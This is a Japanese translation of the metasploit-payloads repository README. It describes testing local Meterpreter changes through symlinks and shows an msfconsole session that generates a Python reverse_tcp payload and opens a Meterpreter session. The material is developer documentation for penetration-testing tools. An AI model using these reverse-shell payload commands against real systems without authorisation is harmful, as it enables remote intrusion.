異なるMetasploit Frameworkペイロードのための統合リポジトリ
これは、異なる Metasploit Framework ペイロードのための統合リポジトリであり、以下のリポジトリを統合したものです:
Mettle と呼ばれる代替のクロスプラットフォーム C Meterpreter は、https://github.com/rapid7/mettle で開発されています。
meterpreter 固有の README、ビルド手順、ライセンスの詳細については、各ディレクトリを参照してください:
Python および PHP Meterpreter については、関連するファイルを ~/.msf4/payloads/meterpreter にシンボリックリンクすることで、これらのファイルへの変更をテストできます。
例として、Python Meterpreter の編集の場合、次のようになります:
mkdir -p ~/.msf4/payloads
cd ~/metasploit-payloads
ln -s ~/metasploit-payloads/python/meterpreter/ext_server_stdapi.py ~/.msf4/payloads/meterpreter/ext_server_stdapi.py
file ~/.msf4/payloads/meterpreter/ext_server_stdapi.py
/home/your_user/.msf4/payloads/meterpreter/ext_server_stdapi.py: symbolic link to /home/your_user/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py
うまくいけば、対応する Meterpreter ペイロードのいずれかを選択してセッションを受信したときに、警告メッセージが表示されるはずです:
msf6 > use payload/python/meterpreter/reverse_tcp
msf6 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o reverse.py
[*] Writing 436 bytes to reverse.py...
msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
[*] Started reverse TCP handler on 192.168.153.128:4444
msf6 payload(python/meterpreter/reverse_tcp) > WARNING: Local file /home/your_user/.msf4/payloads/meterpreter/meterpreter.py is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (24380 bytes) to 192.168.153.1
WARNING: Local file /home/your_user/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.1:50334) at 2022-12-13 12:49:49 -0600
Meterpreter に変更を加える際は、テストモジュールが動作することを確認してください。